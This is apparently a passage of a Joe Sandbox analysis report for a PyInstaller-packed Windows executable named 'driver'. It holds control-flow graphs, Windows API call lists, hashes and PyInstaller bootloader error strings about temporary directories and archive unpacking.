111->121 122 7ff6a29b38e7-7ff6a29b38ed 111->122 138 7ff6a29b3a2f-7ff6a29b3a3e call 7ff6a29b8a20 112->138 113->113 116 7ff6a29b39bb-7ff6a29b39d8 call 7ff6a29b1950 113->116 116->87 130 7ff6a29b39de-7ff6a29b39ef call 7ff6a29b2710 116->130 121->112 123 7ff6a29b38f0-7ff6a29b38fc 122->123 127 7ff6a29b38fe-7ff6a29b3903 123->127 128 7ff6a29b3905-7ff6a29b3908 123->128 127->123 127->128 128->121 131 7ff6a29b390e-7ff6a29b3916 call 7ff6a29c4fa0 128->131 130->99 131->138 141 7ff6a29b3a44-7ff6a29b3a47 138->141 142 7ff6a29b3b45-7ff6a29b3b53 138->142 141->142 145 7ff6a29b3a4d-7ff6a29b3a50 141->145 143 7ff6a29b3b59-7ff6a29b3b5d 142->143 144 7ff6a29b3a67 142->144 146 7ff6a29b3a6b-7ff6a29b3a90 call 7ff6a29c4fa0 143->146 144->146 147 7ff6a29b3b14-7ff6a29b3b17 145->147 148 7ff6a29b3a56-7ff6a29b3a5a 145->148 157 7ff6a29b3a92-7ff6a29b3aa6 call 7ff6a29b8b30 146->157 158 7ff6a29b3aab-7ff6a29b3ac0 146->158 150 7ff6a29b3b2f-7ff6a29b3b40 call 7ff6a29b2710 147->150 151 7ff6a29b3b19-7ff6a29b3b1d 147->151 148->147 149 7ff6a29b3a60 148->149 149->144 159 7ff6a29b3c7f-7ff6a29b3c87 150->159 151->150 153 7ff6a29b3b1f-7ff6a29b3b2a 151->153 153->146 157->158 161 7ff6a29b3be8-7ff6a29b3bfa call 7ff6a29b8a20 158->161 162 7ff6a29b3ac6-7ff6a29b3aca 158->162 159->99 170 7ff6a29b3c2e 161->170 171 7ff6a29b3bfc-7ff6a29b3c02 161->171 164 7ff6a29b3ad0-7ff6a29b3ae8 call 7ff6a29c52c0 162->164 165 7ff6a29b3bcd-7ff6a29b3be2 call 7ff6a29b1940 162->165 175 7ff6a29b3b62-7ff6a29b3b7a call 7ff6a29c52c0 164->175 176 7ff6a29b3aea-7ff6a29b3b02 call 7ff6a29c52c0 164->176 165->161 165->162 177 7ff6a29b3c31-7ff6a29b3c40 call 7ff6a29c4fa0 170->177 173 7ff6a29b3c1e-7ff6a29b3c2c 171->173 174 7ff6a29b3c04-7ff6a29b3c1c 171->174 173->177 174->177 184 7ff6a29b3b87-7ff6a29b3b9f call 7ff6a29c52c0 175->184 185 7ff6a29b3b7c-7ff6a29b3b80 175->185 176->165 186 7ff6a29b3b08-7ff6a29b3b0f 176->186 187 7ff6a29b3d41-7ff6a29b3d63 call 7ff6a29b44d0 177->187 188 7ff6a29b3c46-7ff6a29b3c4a 177->188 200 7ff6a29b3ba1-7ff6a29b3ba5 184->200 201 7ff6a29b3bac-7ff6a29b3bc4 call 7ff6a29c52c0 184->201 185->184 186->165 198 7ff6a29b3d71-7ff6a29b3d82 call 7ff6a29b1c80 187->198 199 7ff6a29b3d65-7ff6a29b3d6f call 7ff6a29b4620 187->199 190 7ff6a29b3c50-7ff6a29b3c5f call 7ff6a29b90e0 188->190 191 7ff6a29b3cd4-7ff6a29b3ce6 call 7ff6a29b8a20 188->191 203 7ff6a29b3c61 190->203 204 7ff6a29b3cb3-7ff6a29b3cb6 call 7ff6a29b8850 190->204 205 7ff6a29b3d35-7ff6a29b3d3c 191->205 206 7ff6a29b3ce8-7ff6a29b3ceb 191->206 213 7ff6a29b3d87-7ff6a29b3d96 198->213 199->213 200->201 201->165 221 7ff6a29b3bc6 201->221 210 7ff6a29b3c68 call 7ff6a29b2710 203->210 220 7ff6a29b3cbb-7ff6a29b3cbd 204->220 205->210 206->205 211 7ff6a29b3ced-7ff6a29b3d10 call 7ff6a29b1c80 206->211 222 7ff6a29b3c6d-7ff6a29b3c77 210->222 228 7ff6a29b3d12-7ff6a29b3d26 call 7ff6a29b2710 call 7ff6a29c4fa0 211->228 229 7ff6a29b3d2b-7ff6a29b3d33 call 7ff6a29c4fa0 211->229 218 7ff6a29b3dc4-7ff6a29b3dda call 7ff6a29b9400 213->218 219 7ff6a29b3d98-7ff6a29b3d9f 213->219 234 7ff6a29b3de8-7ff6a29b3e04 SetDllDirectoryW 218->234 235 7ff6a29b3ddc 218->235 219->218 224 7ff6a29b3da1-7ff6a29b3da5 219->224 226 7ff6a29b3cbf-7ff6a29b3cc6 220->226 227 7ff6a29b3cc8-7ff6a29b3ccf 220->227 221->165 222->159 224->218 230 7ff6a29b3da7-7ff6a29b3dbe SetDllDirectoryW LoadLibraryExW 224->230 226->210 227->213 228->222 229->213 230->218 236 7ff6a29b3f01-7ff6a29b3f08 234->236 237 7ff6a29b3e0a-7ff6a29b3e19 call 7ff6a29b8a20 234->237 235->234 242 7ff6a29b3f0e-7ff6a29b3f15 236->242 243 7ff6a29b3ffc-7ff6a29b4004 236->243 249 7ff6a29b3e32-7ff6a29b3e3c call 7ff6a29c4fa0 237->249 250 7ff6a29b3e1b-7ff6a29b3e21 237->250 242->243 246 7ff6a29b3f1b-7ff6a29b3f25 call 7ff6a29b33c0 242->246 247 7ff6a29b4029-7ff6a29b405b call 7ff6a29b36a0 call 7ff6a29b3360 call 7ff6a29b3670 call 7ff6a29b6fb0 call 7ff6a29b6d60 243->247 248 7ff6a29b4006-7ff6a29b4023 PostMessageW GetMessageW 243->248 246->222 260 7ff6a29b3f2b-7ff6a29b3f3f call 7ff6a29b90c0 246->260 248->247 263 7ff6a29b3ef2-7ff6a29b3efc call 7ff6a29b8b30 249->263 264 7ff6a29b3e42-7ff6a29b3e48 249->264 254 7ff6a29b3e23-7ff6a29b3e2b 250->254 255 7ff6a29b3e2d-7ff6a29b3e2f 250->255 254->255 255->249 269 7ff6a29b3f41-7ff6a29b3f5e PostMessageW GetMessageW 260->269 270 7ff6a29b3f64-7ff6a29b3fa0 call 7ff6a29b8b30 call 7ff6a29b8bd0 call 7ff6a29b6fb0 call 7ff6a29b6d60 call 7ff6a29b8ad0 260->270 263->236 264->263 268 7ff6a29b3e4e-7ff6a29b3e54 264->268 272 7ff6a29b3e5f-7ff6a29b3e61 268->272 273 7ff6a29b3e56-7ff6a29b3e58 268->273 269->270 308 7ff6a29b3fa5-7ff6a29b3fa7 270->308 272->236 276 7ff6a29b3e67-7ff6a29b3e83 call 7ff6a29b6db0 call 7ff6a29b7330 272->276 273->276 277 7ff6a29b3e5a 273->277 289 7ff6a29b3e8e-7ff6a29b3e95 276->289 290 7ff6a29b3e85-7ff6a29b3e8c 276->290 277->236 293 7ff6a29b3eaf-7ff6a29b3eb9 call 7ff6a29b71a0 289->293 294 7ff6a29b3e97-7ff6a29b3ea4 call 7ff6a29b6df0 289->294 292 7ff6a29b3edb-7ff6a29b3ef0 call 7ff6a29b2a50 call 7ff6a29b6fb0 call 7ff6a29b6d60 290->292 292->236 306 7ff6a29b3ec4-7ff6a29b3ed2 call 7ff6a29b74e0 293->306 307 7ff6a29b3ebb-7ff6a29b3ec2 293->307 294->293 305 7ff6a29b3ea6-7ff6a29b3ead 294->305 305->292 306->236 317 7ff6a29b3ed4 306->317 307->292 311 7ff6a29b3fe9-7ff6a29b3ff7 call 7ff6a29b1900 308->311 312 7ff6a29b3fa9-7ff6a29b3fb3 call 7ff6a29b9200 308->312 311->222 312->311 321 7ff6a29b3fb5-7ff6a29b3fca 312->321 317->292 322 7ff6a29b3fe4 call 7ff6a29b2a50 321->322 323 7ff6a29b3fcc-7ff6a29b3fdf call 7ff6a29b2710 call 7ff6a29b1900 321->323 322->311 323->222
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ErrorFileLastModuleName
                                                                                                                                                                                                                                                • String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to load splash screen resources!$Failed to remove temporary directory: %s$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s$MEI$PYINSTALLER_RESET_ENVIRONMENT$PYINSTALLER_STRICT_UNPACK_MODE$PYINSTALLER_SUPPRESS_SPLASH_SCREEN$Path exceeds PYI_PATH_MAX limit.$Py_GIL_DISABLED$VCRUNTIME140.dll$_PYI_APPLICATION_HOME_DIR$_PYI_APPLICATION_HOME_DIR not set for onefile child process!$_PYI_ARCHIVE_FILE$_PYI_PARENT_PROCESS_LEVEL$_PYI_SPLASH_IPC$bye-runtime-tmpdir$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-python-flag
                                                                                                                                                                                                                                                • API String ID: 2776309574-3273434969
                                                                                                                                                                                                                                                • Opcode ID: 230e5f2fbe18b706386c2e6c5de042c78cdf1bdf29ac743ce162c0a9040f007d
                                                                                                                                                                                                                                                • Instruction ID: 1277dd79a844d1a4d0e827266c48365d8da19a83f5b3041addea4afc6c45984e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 230e5f2fbe18b706386c2e6c5de042c78cdf1bdf29ac743ce162c0a9040f007d
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 52328B21A8E68291FA14EB26D4543B966A5EF44F88F844036DA5DC32C7EFACF558F304

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 536 7ff6a29d69d4-7ff6a29d6a47 call 7ff6a29d6708 539 7ff6a29d6a61-7ff6a29d6a6b call 7ff6a29c8590 536->539 540 7ff6a29d6a49-7ff6a29d6a52 call 7ff6a29c4f58 536->540 546 7ff6a29d6a6d-7ff6a29d6a84 call 7ff6a29c4f58 call 7ff6a29c4f78 539->546 547 7ff6a29d6a86-7ff6a29d6aef CreateFileW 539->547 545 7ff6a29d6a55-7ff6a29d6a5c call 7ff6a29c4f78 540->545 559 7ff6a29d6da2-7ff6a29d6dc2 545->559 546->545 550 7ff6a29d6af1-7ff6a29d6af7 547->550 551 7ff6a29d6b6c-7ff6a29d6b77 GetFileType 547->551 556 7ff6a29d6b39-7ff6a29d6b67 GetLastError call 7ff6a29c4eec 550->556 557 7ff6a29d6af9-7ff6a29d6afd 550->557 553 7ff6a29d6bca-7ff6a29d6bd1 551->553 554 7ff6a29d6b79-7ff6a29d6bb4 GetLastError call 7ff6a29c4eec CloseHandle 551->554 562 7ff6a29d6bd3-7ff6a29d6bd7 553->562 563 7ff6a29d6bd9-7ff6a29d6bdc 553->563 554->545 570 7ff6a29d6bba-7ff6a29d6bc5 call 7ff6a29c4f78 554->570 556->545 557->556 564 7ff6a29d6aff-7ff6a29d6b37 CreateFileW 557->564 568 7ff6a29d6be2-7ff6a29d6c37 call 7ff6a29c84a8 562->568 563->568 569 7ff6a29d6bde 563->569 564->551 564->556 574 7ff6a29d6c56-7ff6a29d6c87 call 7ff6a29d6488 568->574 575 7ff6a29d6c39-7ff6a29d6c45 call 7ff6a29d6910 568->575 569->568 570->545 582 7ff6a29d6c8d-7ff6a29d6ccf 574->582 583 7ff6a29d6c89-7ff6a29d6c8b 574->583 575->574 581 7ff6a29d6c47 575->581 584 7ff6a29d6c49-7ff6a29d6c51 call 7ff6a29cab30 581->584 585 7ff6a29d6cf1-7ff6a29d6cfc 582->585 586 7ff6a29d6cd1-7ff6a29d6cd5 582->586 583->584 584->559 587 7ff6a29d6d02-7ff6a29d6d06 585->587 588 7ff6a29d6da0 585->588 586->585 590 7ff6a29d6cd7-7ff6a29d6cec 586->590 587->588 591 7ff6a29d6d0c-7ff6a29d6d51 CloseHandle CreateFileW 587->591 588->559 590->585 593 7ff6a29d6d53-7ff6a29d6d81 GetLastError call 7ff6a29c4eec call 7ff6a29c86d0 591->593 594 7ff6a29d6d86-7ff6a29d6d9b 591->594 593->594 594->588
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1617910340-0
                                                                                                                                                                                                                                                • Opcode ID: 4205a6958293653b93a25a06bf68436f7b6b11ca03fe036e6858b65a4e3d069e
                                                                                                                                                                                                                                                • Instruction ID: fb2cdb28f41e68f012ac534de495ffc7873891c7934d432ecb014d89e333865d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4205a6958293653b93a25a06bf68436f7b6b11ca03fe036e6858b65a4e3d069e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9AC1D032B69A4185EB10CFA6D4902AC37A1FB49F9CB015239DE2E977D6CF78E451E300

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • FindFirstFileW.KERNELBASE(?,00007FF6A29B8B09,00007FF6A29B3FA5), ref: 00007FF6A29B841B
                                                                                                                                                                                                                                                • RemoveDirectoryW.KERNEL32(?,00007FF6A29B8B09,00007FF6A29B3FA5), ref: 00007FF6A29B849E
                                                                                                                                                                                                                                                • DeleteFileW.KERNELBASE(?,00007FF6A29B8B09,00007FF6A29B3FA5), ref: 00007FF6A29B84BD
                                                                                                                                                                                                                                                • FindNextFileW.KERNELBASE(?,00007FF6A29B8B09,00007FF6A29B3FA5), ref: 00007FF6A29B84CB
                                                                                                                                                                                                                                                • FindClose.KERNEL32(?,00007FF6A29B8B09,00007FF6A29B3FA5), ref: 00007FF6A29B84DC
                                                                                                                                                                                                                                                • RemoveDirectoryW.KERNELBASE(?,00007FF6A29B8B09,00007FF6A29B3FA5), ref: 00007FF6A29B84E5
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
                                                                                                                                                                                                                                                • String ID: %s\*
                                                                                                                                                                                                                                                • API String ID: 1057558799-766152087
                                                                                                                                                                                                                                                • Opcode ID: 754801c57d3e7d892bd8d831a0c0450fb277ac1fd7854ad2b3e1f46bb6674256
                                                                                                                                                                                                                                                • Instruction ID: 7cc6a4d92746292e324e660eb2de845f3e9c3ac26a77af6037049b802c1b9b68
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 754801c57d3e7d892bd8d831a0c0450fb277ac1fd7854ad2b3e1f46bb6674256
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F141A521A4E94285EA209B26E4981BD73A1FF98F98F400232D59DC36C7DFBCD546E701
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2295610775-0
                                                                                                                                                                                                                                                • Opcode ID: f8f1f0d53470ef13f354418d29ecb311e48373b0acb6529cbcbe83ca601eafdf
                                                                                                                                                                                                                                                • Instruction ID: 56e463ebe583f942e15888af9eb7f4b722ca1549162f02616e21b2b73093e953
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f8f1f0d53470ef13f354418d29ecb311e48373b0acb6529cbcbe83ca601eafdf
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2BF0C832A5E74187F7608B61B45976A7390BB88B2CF044335D9AD466D6DFBCD048AA00
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentFeaturePresentProcessProcessor
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1010374628-0
                                                                                                                                                                                                                                                • Opcode ID: 10bf4b1f0472125ada9b1d6b923a92a2d49e498fcbab652d34985a7b27debbff
                                                                                                                                                                                                                                                • Instruction ID: c946aace46ff629f1c7e40b5d05544f622ed4f4697b53f9485f5ff8ba1f2a122
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 10bf4b1f0472125ada9b1d6b923a92a2d49e498fcbab652d34985a7b27debbff
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2002BC21E9F64244FAA9AB23A40527926D0AF05FA8F554635ED5DC7BD3DEFCB840B300

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 329 7ff6a29b1950-7ff6a29b198b call 7ff6a29b45b0 332 7ff6a29b1991-7ff6a29b19d1 call 7ff6a29b7f80 329->332 333 7ff6a29b1c4e-7ff6a29b1c72 call 7ff6a29bc5c0 329->333 338 7ff6a29b19d7-7ff6a29b19e7 call 7ff6a29c0744 332->338 339 7ff6a29b1c3b-7ff6a29b1c3e call 7ff6a29c00bc 332->339 344 7ff6a29b1a08-7ff6a29b1a24 call 7ff6a29c040c 338->344 345 7ff6a29b19e9-7ff6a29b1a03 call 7ff6a29c4f78 call 7ff6a29b2910 338->345 343 7ff6a29b1c43-7ff6a29b1c4b 339->343 343->333 351 7ff6a29b1a45-7ff6a29b1a5a call 7ff6a29c4f98 344->351 352 7ff6a29b1a26-7ff6a29b1a40 call 7ff6a29c4f78 call 7ff6a29b2910 344->352 345->339 359 7ff6a29b1a5c-7ff6a29b1a76 call 7ff6a29c4f78 call 7ff6a29b2910 351->359 360 7ff6a29b1a7b-7ff6a29b1afc call 7ff6a29b1c80 * 2 call 7ff6a29c0744 351->360 352->339 359->339 371 7ff6a29b1b01-7ff6a29b1b14 call 7ff6a29c4fb4 360->371 374 7ff6a29b1b35-7ff6a29b1b4e call 7ff6a29c040c 371->374 375 7ff6a29b1b16-7ff6a29b1b30 call 7ff6a29c4f78 call 7ff6a29b2910 371->375 380 7ff6a29b1b50-7ff6a29b1b6a call 7ff6a29c4f78 call 7ff6a29b2910 374->380 381 7ff6a29b1b6f-7ff6a29b1b8b call 7ff6a29c0180 374->381 375->339 380->339 389 7ff6a29b1b9e-7ff6a29b1bac 381->389 390 7ff6a29b1b8d-7ff6a29b1b99 call 7ff6a29b2710 381->390 389->339 393 7ff6a29b1bb2-7ff6a29b1bb9 389->393 390->339 394 7ff6a29b1bc1-7ff6a29b1bc7 393->394 396 7ff6a29b1be0-7ff6a29b1bef 394->396 397 7ff6a29b1bc9-7ff6a29b1bd6 394->397 396->396 398 7ff6a29b1bf1-7ff6a29b1bfa 396->398 397->398 399 7ff6a29b1c0f 398->399 400 7ff6a29b1bfc-7ff6a29b1bff 398->400 402 7ff6a29b1c11-7ff6a29b1c24 399->402 400->399 401 7ff6a29b1c01-7ff6a29b1c04 400->401 401->399 403 7ff6a29b1c06-7ff6a29b1c09 401->403 404 7ff6a29b1c26 402->404 405 7ff6a29b1c2d-7ff6a29b1c39 402->405 403->399 406 7ff6a29b1c0b-7ff6a29b1c0d 403->406 404->405 405->339 405->394 406->402
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6A29B7F80: _fread_nolock.LIBCMT ref: 00007FF6A29B802A
                                                                                                                                                                                                                                                • _fread_nolock.LIBCMT ref: 00007FF6A29B1A1B
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6A29B2910: GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF6A29B1B6A), ref: 00007FF6A29B295E
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: _fread_nolock$CurrentProcess
                                                                                                                                                                                                                                                • String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
                                                                                                                                                                                                                                                • API String ID: 2397952137-3497178890
                                                                                                                                                                                                                                                • Opcode ID: 7f967e8bf4bd65ccd330245f6cf3beef5728b9bf280203bc786e936cb306ff0d
                                                                                                                                                                                                                                                • Instruction ID: cb6eb3efc9c809685b3159172aaa5a70fe23eb464f4288205dfcd277276fc10c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7f967e8bf4bd65ccd330245f6cf3beef5728b9bf280203bc786e936cb306ff0d
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0681C171A4E6868AEB60DB26D0512B923A1EF48F8CF404435E98DC778BDFBCE545B740

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 407 7ff6a29b1600-7ff6a29b1611 408 7ff6a29b1613-7ff6a29b161c call 7ff6a29b1050 407->408 409 7ff6a29b1637-7ff6a29b1651 call 7ff6a29b45b0 407->409 416 7ff6a29b162e-7ff6a29b1636 408->416 417 7ff6a29b161e-7ff6a29b1629 call 7ff6a29b2710 408->417 414 7ff6a29b1682-7ff6a29b169c call 7ff6a29b45b0 409->414 415 7ff6a29b1653-7ff6a29b1681 call 7ff6a29c4f78 call 7ff6a29b2910 409->415 424 7ff6a29b169e-7ff6a29b16b3 call 7ff6a29b2710 414->424 425 7ff6a29b16b8-7ff6a29b16cf call 7ff6a29c0744 414->425 417->416 431 7ff6a29b1821-7ff6a29b1824 call 7ff6a29c00bc 424->431 432 7ff6a29b16d1-7ff6a29b16f4 call 7ff6a29c4f78 call 7ff6a29b2910 425->432 433 7ff6a29b16f9-7ff6a29b16fd 425->433 441 7ff6a29b1829-7ff6a29b183b 431->441 446 7ff6a29b1819-7ff6a29b181c call 7ff6a29c00bc 432->446 435 7ff6a29b16ff-7ff6a29b170b call 7ff6a29b1210 433->435 436 7ff6a29b1717-7ff6a29b1737 call 7ff6a29c4fb4 433->436 443 7ff6a29b1710-7ff6a29b1712 435->443 447 7ff6a29b1761-7ff6a29b176c 436->447 448 7ff6a29b1739-7ff6a29b175c call 7ff6a29c4f78 call 7ff6a29b2910 436->448 443->446 446->431 449 7ff6a29b1802-7ff6a29b180a call 7ff6a29c4fa0 447->449 450 7ff6a29b1772-7ff6a29b1777 447->450 460 7ff6a29b180f-7ff6a29b1814 448->460 449->460 453 7ff6a29b1780-7ff6a29b17a2 call 7ff6a29c040c 450->453 462 7ff6a29b17a4-7ff6a29b17bc call 7ff6a29c0b4c 453->462 463 7ff6a29b17da-7ff6a29b17e6 call 7ff6a29c4f78 453->463 460->446 469 7ff6a29b17be-7ff6a29b17c1 462->469 470 7ff6a29b17c5-7ff6a29b17d8 call 7ff6a29c4f78 462->470 468 7ff6a29b17ed-7ff6a29b17f8 call 7ff6a29b2910 463->468 475 7ff6a29b17fd 468->475 469->453 472 7ff6a29b17c3 469->472 470->468 472->475 475->449
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
